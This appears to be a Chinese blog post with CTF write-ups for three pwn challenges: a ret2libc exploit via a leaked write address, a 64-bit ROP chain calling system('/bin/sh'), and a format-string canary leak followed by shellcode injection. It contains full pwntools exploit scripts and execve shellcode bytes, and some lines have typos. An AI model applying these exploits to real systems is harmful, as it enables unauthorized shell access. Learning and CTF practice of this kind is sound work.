<!DOCTYPE html><html><head><meta name="generator" content="Hexo 3.8.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="pwn level3 level2_x64及pwn1"><meta name="keywords" content="pwn"><meta name="author" content="QianKeTutu"><meta name="copyright" content="QianKeTutu"><title>pwn level3 level2_x64及pwn1 | QianKeTutu</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.6.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.6.1"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">QianKeTutu</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">7</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">2</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">QianKeTutu</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">pwn level3 level2_x64及pwn1</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2019-07-27</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>#level3与level2_x64及pwn1总结</p>
<p>##level3<br>在Ubuntu虚拟机里用checksec 文件名命令，查看保护机制，程序是32位，用./文件名命令，运行程序，再用IDA打开，结合分析程序的执行逻辑。发现vulnerable_function()函数里存在栈溢出漏洞，看函数列表，没有callsystem函数，也没有_system函数，也没有/bin/sh字符串，但题给了libc库，肯定要用到啊，用IDA打开，发现有/bin/sh字符串，system函数，而且发现源程序里有write函数，用这个函数泄露出我们想要的地址（就是write函数真正的地址）.再利用，libc库中函数偏移值相等这一原理，求出更多需要的地址（就是system,/bin/sh的地址），在实行覆盖，执行system函数，得到shell.</p>
<p>exp如下：</p>
<pre><code> from pwn import* 
 context.log_level=&apos;DEBUG&apos;
 p=remote(&quot;pwn2.jarvisoj.com&quot;,9879)
 plt_write_addr=0x08048340
 got_write_addr=0x0804A018
 main_addr=0x08048484
 p.recvline()
 payload_one=&apos;a&apos;*(0x88+0x4)+p32(plt_write_addr)+p32(main_addr)+p32(1)+p32(got_write_addr)+p32(4)
p.send(payload_one)
write_addr=u32(p.recv(4))
libc=ELF(&quot;libc-2.19.so&quot;)
libc_system=libc.symbols[&quot;system&quot;]
libc_binsh=next(libc.search(&quot;/bin/sh&quot;))
libc_write=libc.symbols[&quot;write&quot;]

x=write_addr-libc_write
system_addr=x+libc_system
binsh_addr=x+libc_binsh
payload=&apos;a&apos;*0x88+&apos;a&apos;*4+p32(system_addr)+p32(0)+p32(binsh_addr)

p.sendline(payload)
p.interactive()</code></pre><p>原理就是：大原理还是栈溢出，小原理就是：利用plt,  got.plt,  libc,之间的关系及write函数求我们需要的地址.</p>
<p>##level2_x64<br>首先在Ubuntu虚拟机里用checksec 文件名命令，查看防护信息，NX enabled状态，不能用shellcode.<br>用IDA打开，与32位level2一样，有_system函数，有/bin/sh字符串，原理也和32位level2一样，不同的是与32位，传参方式不同，64位用寄存器传参，存第一个参数的寄存器就是rdi，用<strong>ROPgadget –binary level2_x64（level2_x6<br>4就是文件名） –only “pop|ret”</strong> 命令查看rdi的地址，传参方式就是 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">                 payload=&apos;a&apos;*(0x80+0x8)+p64(rdi_addr)+p32(sh_addr)+p32(system_add)+0x8*&apos;a&apos;</span><br><span class="line">先写寄存器地址（rdi——addr），再写字符串/bin/sh的地址（sh_addr），再写（system_addr）的地址，意思就是：把/bin/sh先存到rdi里，又作为参数传给system_addr函数，因此达到构造后门的目的.最后加上的</span><br><span class="line">0x8*&apos;a&apos;是用来覆盖_system函数形成栈的rbp的，这一题中，覆盖不覆盖都可以，有的题必须要覆盖.</span><br><span class="line"></span><br><span class="line">exp如下：</span><br></pre></td></tr></table></figure>

<pre><code>from pwn import *

r=remote(&quot;pwn2.jarvisoj.com&quot;,9882)

f_addr=0x00000000004006b3

s_addr=0x00000000004004C0

bin_addr=0x0000000000600A90

payload=&apos;a&apos;*(0x80+0x8)+p64(f_addr)+p64(bin_addr)+p64(s_addr)+&apos;a&apos;*0x8

r.sendline(payload)
r.interactive()</code></pre><p>原理参考32位的level2，<strong>本题重点是明白x64位的传参方式与32位的区别，并会构造payload</strong></p>
<p>##pwn1，格式化字符串漏洞<br>查看保护机制，查看是32位还是64位，本题是32位，NX是disabled，有canary保护.运行一下程序，知道程序的运行流程，用IDA打开，分析程序的运行流程，找出漏洞点.经分析发现get_message函数里存在栈溢出漏洞.并且printf()函数，没有格式化，所以可利用print()函数打印出我们所需要的地址，实行覆盖，构造后门函数，得到shell.</p>
<p>涉及知识：gdb调试，栈的结构，栈中距离的计算.</p>
<p>exp如下：</p>
<pre><code>1.    from pwn import *
2.    #shellcode=asm(shellcraft.sh())
3.    shellcode=&quot;\x31\xc0\x31\xd2\x31\xdb\x31\xc9\x31\xc0\x31\xd2\x52\x68\x2f\x2f&quot; \
&quot;\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0&quot; \&quot;\x0b\xcd\x80\n&quot;
      context.log_level=&apos;debug&apos;
4.    #p=remote(&quot;172.16.80.240&quot;,8000)
5.    p=process(&quot;./pwn1&quot;)
6.    p=recvuntil(&quot;name:&quot;)
7.    p.sendline(&apos;%p.&apos;*40)
8.    leak_data=p.recvuntil(&apos;messages:&apos;)
9.    address=leak_data.split(&apos;.&apos;)
11.   for i in range(len(address)):
      print str(i)+&quot;:&quot;+str(address[i])
12.   canary=address[30]
13.   print &quot;canary=&quot;+canary
14.   prev_ebp_addre=address[33]
15.   print &quot;leakebp_addr=&quot;+prev_ebp_addr
16.   real_ebp_addr=int(prev_ebp_addr,16)-144
16.   shellcode_addr=real_ebp_addr+8
17.   payload=&apos;a&apos;*100+p32(int(canary,16))+&apos;a&apos;*12+p32(shellcode_addr)+shellcode
18.   p.sendline(payload)
19.   p.interactive()</code></pre><p>注释：2.,3.</p>
<hr>
<p><strong>shellcode=asm(shellcraft.sh())=”\x31\xc0\x31\xd2\x31\xdb\x31\xc9\x31\xc0\x31\xd2\x52\x68\x2f\x2f” <br>     “\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0” &quot;\x0b\xcd\x80\n</strong></p>
<p>   7.发送40个“%p.”</p>
<p>   9.用‘.’分割leak_data,存入address数组</p>
<p>   11.遍历数组打印出数组中的所有元素</p>
<p>   12.13.14.15.gdb调试查看栈的结构，找出canary的位置是31，ebp是34</p>
<p>   <strong>16.144是这样算得的，泄露出来的ebp的地址-ebp真正的地址=一个偏移量，此时偏移量等于144，所以，泄露出来的ebp的地址-这个偏移量就是ebp的真正的地址.<br>    为什么要加8呢？是这样的：想想栈的结构，p32(shellcode_addr)覆盖的是函数返回地址，在ebp的下面，就是ebp真正地址+4的位置，shellcode_addr就要放在real_ebp_addr+8的位置,shellcode放在其后给shellcode_addr传参.</strong></p>
<p>17.先解释覆盖的过程：</p>
<p> ‘a’<em>100覆盖canary之前栈的东西，p32(int(cabary,16))覆盖canary的位置，确保了canary一样，绕过了保护机制，’a’</em>12覆盖了canary到ebp的栈中的东西，p32(shellcode_addr)覆盖函数返回地址，shellcode给shellcode_addr传参.</p>
<p>  <strong>还是栈的结构</strong></p>
<p>再解释</p>
<p> 100是用源程序中给定的栈的大小是0x70（0x70=112）+ebp（0x4=4）-栈顶到canary的距离（12）-canary本身（4）=100</p>
<p>12是canary到栈底的距离</p>
<p> **原理就是：大方面的原理还是栈溢出，小方面的原理就是printf()函数没有格式化，以至于我们可以利用它来泄露出我们想要的地址，就是canary及ebp的地址，再利用栈溢出进行覆盖，得到shell.</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">QianKeTutu</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://yoursite.com/2019/07/27/pwn3_x64_2_str/">http://yoursite.com/2019/07/27/pwn3_x64_2_str/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/pwn/">pwn</a></div><nav id="pagination"><div class="next-post pull-right"><a href="/2019/07/25/pwn012/"><span>pwn level0，1，2</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2019 By QianKeTutu</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.6.1"></script><script src="/js/fancybox.js?version=1.6.1"></script><script src="/js/sidebar.js?version=1.6.1"></script><script src="/js/copy.js?version=1.6.1"></script><script src="/js/fireworks.js?version=1.6.1"></script><script src="/js/transition.js?version=1.6.1"></script><script src="/js/scroll.js?version=1.6.1"></script><script src="/js/head.js?version=1.6.1"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>